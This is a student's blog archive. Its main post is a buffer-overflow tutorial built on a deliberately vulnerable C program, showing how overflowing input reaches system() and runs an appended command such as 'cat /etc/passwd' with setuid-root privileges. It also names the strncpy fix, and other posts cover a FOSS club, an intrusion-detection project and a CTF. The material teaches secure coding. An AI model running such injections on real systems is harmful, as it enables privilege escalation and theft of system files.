abijith-kp.github.io

I am shifting my blog to Github. You can see my new posts here. I have copied some posts from here to the new blog(but not all). Hope to see all there 🙂

Advertisements

Buffer Overflow: Part 2

It has been very long since I have written something for the blog now, especially for the last post which I had mentioned that I would come back with a second part for it. Coming straight to the point, we have it here. 🙂
Just a recap of what we have talked about before on buffer over flow attacks: Any attack that exploits the factor that the copying of a string to a buffer is not checked for size(string length) limit can be included in the Buffer Overflow attack category.
At first we will look at a simple demonstration for the buffer overflow attack. For this we should have a vulnerable program written. Without loss of generality we can use the below program for demonstration and if required further study because as the program size increases, just the complexity to find the limit for buffer overflowing increases, mostly all other factors remains same.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
char cmd[10];
char buf[500];

strcpy(buf, argv[1]);
printf(“\n%s   [[[[[%s]]]]]]\n”, buf, cmd);
system(cmd);

return 0;
}

What this program does:
Simply copies the first command line argument to a character
variable buf of size 500. At a later stage, the command list stored in the
variable cmd is executed using the in-built function system.

Vulnerability:
* The length of the command line argument is not compared(checked) with
the size of the destination variable – buf. The part of the input that
overflows the buf array and gets overwritten into the cmd variable which
in-turn gets executed automatically using the system function.

  • If the final executable is a set-uid program, then the running
    process can automatically inherit the the permissions of the owner
    program. Say if the owner was root, the attacker gets superuser
    power.

What can be done:
Use strncpy instead of strcpy. Strncpy helps us to specify the length
of sting that is to be copied to the final destination. On the other
hand the default length for stcpy would the maximum string length.
(Refer MAN pages for strcpy and strncpy)

Below given is the input and output for various lengths of inputs(different
lengths for the string AAAA…AAA):

BufferOverFlow||22:41$ ./simple python2.7 -c 'print "A" * 510'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[p�k�]]]]]]
sh: $’p\205k\206\377\177′: command not found

BufferOverFlow||22:42$ ./simple python2.7 -c 'print "A" * 511'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[@�y$]]]]]]
sh: @�y$: command not found

BufferOverFlow||22:41$ ./simple python2.7 -c 'print "A" * 512'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[]]]]]]

BufferOverFlow||22:42$ ./simple python2.7 -c 'print "A" * 513'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[A]]]]]]
sh: A: command not found

BufferOverFlow||22:41$ ./simple python2.7 -c 'print "A" * 515'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[[[[[AAA]]]]]]
sh: AAA: command not found

This shows us that (for the above given program) when the input size becomes larger than or equal to 513(remember that the buffer length was 500charactors), the second variable, cmd starts to get overwritten by the excess or in our case the overflowed characters from the input. Therefore a conclusion can be made that if the input string can be formatted in such a way that a valid bash command can be appended to the last of 512 random characters, that will get executed .i.e., python2.7 -c 'print "A" * 512 + "&lt;required command&gt;"'

If the input was python2.7 -c 'print "A" * 512 + "cat /etc/passwd"', the attacker would be able to read the passwd file from the vulnerable machine.

NOTE: If space is to be used outside double or single quotes while giving input to the above program, remember to escape it using a backslash in the beginning.

This attack can be extended easily:
The statement terminating symbol for bash script is a semi colon. So, therefor, by using a semi colon at the end of each statement to make a small script to be given as the input, could prove to be more dangerous.

IMPORTANT:
“Do not use system() from a program with set-user-ID or set-group-ID privileges, because strange values for some environment variables might be used to subvert system integrity. Use the exec(3) family of functions instead, but not execlp(3) or execvp(3).  system() will not, in fact, work properly from programs with set-user-ID or set-group-ID privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.  (Debian uses a modified bash which does not do this when invoked as sh.).” – Linux MAN Pages(SYSTEM(3))

“If the destination string of a strcpy() is not large enough, then anything might happen. Overflowing fixed-length string buffers is a favorite cracker technique for taking complete control of the machine. Any time a program reads or copies data into a buffer, the program first needs to check that there’s enough space. This may be unnecessary if  you  can  show that overflow is impossible, but be careful: programs can get changed over time, in ways that may make the impossible possible.” – Linux MAN Pages(STRCPY(3))

Most programs written in C would have some parts of it using a strcpy function call. A BOF attack can be designed to exploit this vulnerable function. In the next level we would remove the system function call and inject the code through the input(instead of the command list for system function call)which would get executed in the stack.

New link can be found at abijith-kp.github.io

Buffer Overflow: Part 1

Have anyone you heard the statement: “Water water everywhere. But not a drop to drink”. You will understand this, if you start looking for a tutorial to learn about buffer overflow. Everyone of it would tell the same set of instructions, but nothing works. They all are missing out the main and important points. With this post I am trying to make up for that problem. Here I will be giving all the required background research about buffer overflow and the attack which uses this exploit.

When we pour more water into a glass, it overflows. The overflown water can really be a mess. The same thing happens in the case of a buffer overflow in a program also. When the size of the data to be stored is more than the size of the buffer allocated for the variable, the data is copied to the adjacent memory locations. By the way a buffer is a term given for the continues memory locations allocated for a variable. this overflow may lead to overwriting of the adjacent stack pointers such as ESP or EIP. This kind of overwriting of stack pointers can lead to serious problems like escalating ones privilege, or may be crashing the whole system. Even when people always talk about(me included :P) styles of programming and other related things but programmers are never taught or they think about SECURE CODDING which is equally important but ironically given the least importance(May only be true among beginners and intermediate people. This is since expert people works in production environment and its very crucial in that situation to follow security measures).

Buffer overflow attack mainly aims at those executable files which has a setuid bit enabled. This setuid bit gives the executable a property that it will inherit all the privileges of its owner rather than the user which runs the executable. So if somehow a shell is spawned while running this process the shell will run with the privileges of root user if the owner of the executable was root. Thus explicitly, the assumptions that we take while using the below mentioned attack on an executable are:    1. Owner of the executable is root;  2. Setuid bit is enabled

Next two main concepts that we have to give importance are NOP Sled and the payload script named as a shell script.

(… to be continued…)

New link can be found at abijith-kp.github.io

FOSSCell reviving…

There were many inventions that happened due to accidents. In our case the accident resulted in the second life for FOSSCell at our campus. Now I cannot even remember how our small discussions grew up into this.

Earlier the FOSSCell was started by few of our seniors of which I remember(maybe, only know) is Praveen. It was born at a time “long long ago…”. The kind of vision these people had was very clear and solid when this group formed in our college. Later it had grown a lot. But as everything that has a start has an end, there were bad and gloomy days for FOSSCell also.
Even when people getting into the college are intelligent and wise, they have less awareness about these kind of topics that is something like “must know” in the case of a Computer Science graduate (this is just my personal opinion, I dint mean to hurt anyone’s feeling 😉 ). When ever a workshop is conducted, the irony that is observed is, even when there is lot of participation from the juniors, but people knowing the basic idea(even heard) about these topics are very less. Not only this, the main coding competitions that others outside die to get in, like Google Summer of Code, ACM ICPC etc are all unknown for them.

I personally has seen a speaker reducing the number of topics that he has to present, only because people din’t know the basics. Here I am not trying to tell the point that, not knowing the basics initially is the problem. The problem is actually not with the freshers that come into this college, but with their seniors who are already in the college.
One of the main problem here is that “seniors” just minds their own business and completes the four years at college. They don’t take much time to teach or talk to juniors about technical matters. May be till this year I was also in that group. But there are exceptions.

Few of us in final and pre-final year had discussions on these matters for like three, four days. It was some serious discussions we had. Everyone had something to say and wanted to do something to make a change. Then we decided to take the Software Freedom Day that was coming up as chance to start our work. We clearly knew that the fresh minds, that is second years should be given a very good orientation about what we really intent to do, about our view, aims and working style. We planned on the main point that we have to put up during our talk with the juniors. We spent most of our time in making the presentation for the orientation.

During the SFD celebrations we tried to make all the talks, as much interactive and interesting as possible. We all who were into conducting these talks and workshops really worked hard to make it ass simple as possible and we followed a practical approach. Hands-on work could give them a clear cut idea on the issues that they will face in during the development of any big projects. We believe that this is very important to learn new things. One cannot learn swimming by just reading a book which says “Swimming for Dummies” :P.

Later after that we had arranged for doing some hands-on projects which are still going on. The topics for the projects were mainly divided into two parts people who liked web-development and others. Web development was taken as a separate topic, was to encourage students to contribute to the Content Management System made for Tathva and Ragam by people from my year.

Another idea behind doing all these was that introducing students to open source communities and the methodology that are made use of by the community. In simple words we wanted to encourage students to use mailing lists rather than social networking sites for all kind of discussions, and wanted them to learn about version control systems, basics to intermediate usage and administration of Linux based operating systems. The replies that our mailing list got  for the first post after these discussion was the highest for any post ever got, in that mailing list. This was really appreciated by many of our seniors. And then we got lucky that one of our alumni had come for the SFD celebrations, after he read about it on the mailing list.

This try is meant for inculcating “free and open source” values to our juniors mainly students who are yet to come. Starting the efforts by orienting the current second years is just a small step toward a bigger leap in the future. Currently everything is going in a positive slop. We hope this streak never fails again like what happened in the near past. We people who will be graduating this academic year is expecting that our juniors will continue bearing the torch that we have lit together. 🙂

I know that its not yet the time to tell this, but I should do it.: Thank you all for giving me this great experience.

major project-2

This is the continuation of this post.

We were able to find a mailing-list for STAT development in sourceforge[dot]net. The source code for few STAT based IDS were also available there, like NetSTAT, USTAT, etc. This finding actually has reduced the effort that we had put down in writing a compiler for STAT Language. It was a like a bonus that we were also able to find a STAT editor to graphically represent the attack scenario and obtain the stat file corresponding to the figure. This STATed was implemented in Java. The compiler could convert a STAT Language source to C-source file.

While installing STATL compiler and the STATed – STAT scenario editor we faced a few difficulties with the dependencies. I had put those in the corresponding mailing list. Still the problem, while installing the Winstat(IDS) persists. But the STATL compiler and the STATed were installed successfully.

major project starts

Here starts the next major step in my academic life: Major Project. I like to see this work to be very important but I have also seen people who don’t want to do even this. They just want to get into some group and just survives there by utilizing the energy of other teammates.

As always when I start off a project I have lot of expectation about it. Completion then developing it, putting it in the public domain and allowing others to improve the work. But most of these don’t work out… :D. But this time I really want to make a change to it. And I will.
This time I going with a project on Intrusion Detection System. We are planning to make it on top of STAT framework. There would be a need to implement a compiler for STAT Language* also. We actually has no materials other than few (old)papers relating to it. But we took this project only because we felt it would be very interesting to modal an attack on the basis of a new frame work. Initially after making a compiler for a subset of the language we would like to give Proof of Concept for few attack signatures. Then we would be able to assert that this compiler could be extended to detect many more different attack patterns.

In the first phase we have to identify which all attacks are we modeling and also should decide on the method to implement the compiler for STATL and we also need to decide on the subset of STATL that would help us represent the identified attack sequences.

I will update this post as it goes.

EDIT: Continuation of this post is added here.

*Similar existing language would be Snort.

Hacking at InCTF-Part2

This post a continuation of my older post Hacking at InCTF-Part1.

When the organizers of the event called us for announcing the winners, they requested that one person from each team to talk about our experience at InCTF. I was the person who went from my team. Actually I had many thing to say but when I got there I didn’t talk much. Out of 11-13 teams participated we were able to make it to the fifth position. The first thought that came to me when I write this post is that this event had given me a good experience in a totally different field which altogether changed my interests.

Final round of InCTF was conducted at Amrita College, Amritapuri Campus for two days, on June 1, June 2.  First of all it was a great experience reaching there. I took the tickets and was waiting for my friends in front of the train. But they got into the train before calling me and the train started. When the train was at a distance that I could not catch I called them up and said that I didn’t get and made them jump back to the platform :P. Then we had to catch a bus to Kayamkulam and we reached very late, on the last bus to the college.

Next day was a practice session where we were given a vulnerable Ubuntu image. First we had to bypass the login and change the root password. As we were newbies in this area we were only able to bypass this login. But inside we had to start few custom made services and exploit its vulnerabilities. There were three services that we had to start. The source code of the vulnerable services were also provided. It would basically be written in either of Python, C, and C++. We could actually understand what will be the work flow of the program. But even with our basic understanding that we should use a buffer-overflow attack to retrieve whatever data we need, we could not put that into practice. This was when I really felt that our seniors could have helped us a bit more. I don’t want to put blame on them because they were the people who intimated us that there is a competition like this is being conducted. I am really thankful to them for it.

After the first round we three team members did run behind the organizers to give give us some tips on how and what to do. They were very helpful and gave us tips on how to crack this competition. I think we utilized all the chance that we got to talk to the organizers especially Bithin. Seshagiri Prabhu, Aravind S Raj. More than the competition we had a friendly conversation and exchanged our views on various topics not like professionals but as people who want to learn new things.

That night we decided that we read some related materials. But the the situation was against us. No range to get Internet connection… tiredness due to travel… everything came together :(. Even then we sat for some time just talking on what to do the next day. From the inspiration from our seniors and the fact that they were the winners last time, we were looking to forward to doing a good performance at the event.
On the second day when we started there was only one method that was in our mind to get a remote connection, SSH. But the irony was that we could not use it as the password was reset at the beginning. It may be that we did not have knowledge on how bypass it. Initially nobody did get any points. But later one started to score. After sometime we got a different method of attack and we were able to use it effectively. From what my seniors have told, automating the task could fetch us more points. So we automated the task. With this we were in the top three for about half of the event.

But everything reversed within a few minutes…. Some guy used the vulnerability in the service to inject “rm -rf” command to the root directory of the service. By the time we solved this issue by copying files from the backup we had… we lost many points for lagging behind and we came down the scoreboard. Even then we were confident that we could make it to the top by the end of the day. Again problem came in. We could not make the script run correctly. The original one was not backed-up. Solving this issue was like a NP-Hard problem for us at that time. By the time we figured out few new methods time was finished and we had to wind the event. We had to satisfy with fifth position in the event. This was decided on the basis of our performance in both second and the final round.

Even though we could not win the competition, it was a great learning opportunity and a chance to meet many new people. I would like to recommend students or people who are interested in security field to attend this kind of CTF competitions. This could give you a exposure to different kind of techniques and methods that other experts use. And an opportunity to talk to them as well.
Anyway now I am hopping to be a part of future verions of InCTF and many other events of similar kind. 🙂

New link can be found at abijith-kp.github.io